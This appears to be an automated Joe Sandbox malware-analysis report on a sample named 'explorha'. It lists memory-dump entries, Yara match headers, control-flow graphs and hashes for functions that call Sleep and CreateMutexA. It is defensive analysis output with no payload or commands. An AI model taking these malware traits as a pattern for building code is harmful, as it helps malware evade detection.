                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151023835.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151058621.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151144580.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151175401.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151203725.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151234734.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151261377.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151380748.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151409148.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151441167.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151473024.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151566498.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151599544.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151627064.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151654854.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151686222.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151710781.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151736052.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151766410.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151802690.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151830791.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151857043.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151884415.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151914320.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151940989.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151964516.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151990040.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152020128.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152046032.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152071170.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152099497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152125808.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152151116.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152180833.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152294324.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152324625.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152355017.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152382475.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152409880.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152436972.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152462990.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 9d27d17a3de83d766ad34ad8e2a177fb71e34382df27cdd03e4b32d6b144397e
                                                                                                                                                                                                                                        • Instruction ID: 54a34b62f01f37d1b727f4eb5734d6e91f2a5eb1ffc778ff3a76cd2ad2a587bb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9d27d17a3de83d766ad34ad8e2a177fb71e34382df27cdd03e4b32d6b144397e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A3124B1714204DBFB08DB6CCC987ADB6A2EB82314F208318E914977D2EB7D99808751
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00709B49 Relevance: 3.1, APIs: 2, Instructions: 127sleepsynchronizationCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 62 709b49-709b69 66 709b97-709bb3 62->66 67 709b6b-709b77 62->67 70 709be1-709c00 66->70 71 709bb5-709bc1 66->71 68 709b79-709b87 67->68 69 709b8d-709b94 call 71ecf8 67->69 68->69 72 70a400 68->72 69->66 76 709c02-709c0e 70->76 77 709c2e-70a3e6 call 719750 70->77 74 709bc3-709bd1 71->74 75 709bd7-709bde call 71ecf8 71->75 79 70a423-70a466 Sleep CreateMutexA 72->79 80 70a400 call 7382fa 72->80 74->72 74->75 75->70 83 709c10-709c1e 76->83 84 709c24-709c2b call 71ecf8 76->84 80->79 83->72 83->84 84->77
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151023835.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151058621.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151144580.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151175401.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151203725.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151234734.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151261377.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151380748.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151409148.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151441167.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151473024.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151566498.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151599544.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151627064.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151654854.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151686222.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151710781.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151736052.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151766410.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151802690.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151830791.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151857043.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151884415.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151914320.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151940989.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151964516.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151990040.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152020128.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152046032.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152071170.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152099497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152125808.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152151116.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152180833.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152294324.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152324625.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152355017.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152382475.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152409880.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152436972.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152462990.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 170710e0a0bb7db5f85b7fe38d3142c6a9cef6bd5a674cbafb0200890575598d
                                                                                                                                                                                                                                        • Instruction ID: c678721ae1464e3063d3df7c184678ce5adefc8afe15342da7c0ba9c4f616877
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 170710e0a0bb7db5f85b7fe38d3142c6a9cef6bd5a674cbafb0200890575598d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 623148B1704244DBFB08DB7CDC9879DB7E29B85324F208318E514977D2DB7D59808761
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00709C7E Relevance: 3.1, APIs: 2, Instructions: 126sleepsynchronizationCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 93 709c7e-709c9e 97 709ca0-709cac 93->97 98 709ccc-709ce8 93->98 99 709cc2-709cc9 call 71ecf8 97->99 100 709cae-709cbc 97->100 101 709d16-709d35 98->101 102 709cea-709cf6 98->102 99->98 100->99 105 70a405 100->105 103 709d63-70a3e6 call 719750 101->103 104 709d37-709d43 101->104 107 709cf8-709d06 102->107 108 709d0c-709d13 call 71ecf8 102->108 110 709d45-709d53 104->110 111 709d59-709d60 call 71ecf8 104->111 113 70a423-70a466 Sleep CreateMutexA 105->113 114 70a405 call 7382fa 105->114 107->105 107->108 108->101 110->105 110->111 111->103 114->113
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151023835.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151058621.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151144580.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151175401.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151203725.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151234734.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151261377.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151380748.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151409148.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151441167.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151473024.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151566498.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151599544.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151627064.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151654854.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151686222.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151710781.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151736052.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151766410.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151802690.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151830791.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151857043.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151884415.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151914320.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151940989.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151964516.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151990040.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152020128.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152046032.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152071170.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152099497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152125808.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152151116.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152180833.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152294324.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152324625.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152355017.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152382475.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152409880.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152436972.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152462990.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 0d2d176bad3508827fd24f57126c4613113eae6bd2e67ac431babc8b9feec682
                                                                                                                                                                                                                                        • Instruction ID: 0b1aa3b3f3b33336601c2aa1445994b2ef367441b03d19a4335a42a8b922d201
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d2d176bad3508827fd24f57126c4613113eae6bd2e67ac431babc8b9feec682
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D314871700204DBFB08DB7CCC9879DBBA2EB82314F208718E514977D2E77D99808761
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00709EE8 Relevance: 3.1, APIs: 2, Instructions: 124sleepsynchronizationCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 124 709ee8-709f08 128 709f36-709f52 124->128 129 709f0a-709f16 124->129 132 709f80-709f9f 128->132 133 709f54-709f60 128->133 130 709f18-709f26 129->130 131 709f2c-709f33 call 71ecf8 129->131 130->131 136 70a40f 130->136 131->128 134 709fa1-709fad 132->134 135 709fcd-70a3e6 call 719750 132->135 138 709f62-709f70 133->138 139 709f76-709f7d call 71ecf8 133->139 140 709fc3-709fca call 71ecf8 134->140 141 709faf-709fbd 134->141 143 70a414-70a466 call 7382fa * 3 Sleep CreateMutexA 136->143 144 70a40f call 7382fa 136->144 138->136 138->139 139->132 140->135 141->136 141->140 144->143
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151023835.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151058621.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151144580.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151175401.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151203725.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151234734.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151261377.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151380748.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151409148.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151441167.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151473024.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151566498.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151599544.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151627064.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151654854.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151686222.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151710781.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151736052.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151766410.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151802690.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151830791.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151857043.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151884415.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151914320.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151940989.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151964516.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151990040.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152020128.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152046032.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152071170.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152099497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152125808.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152151116.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
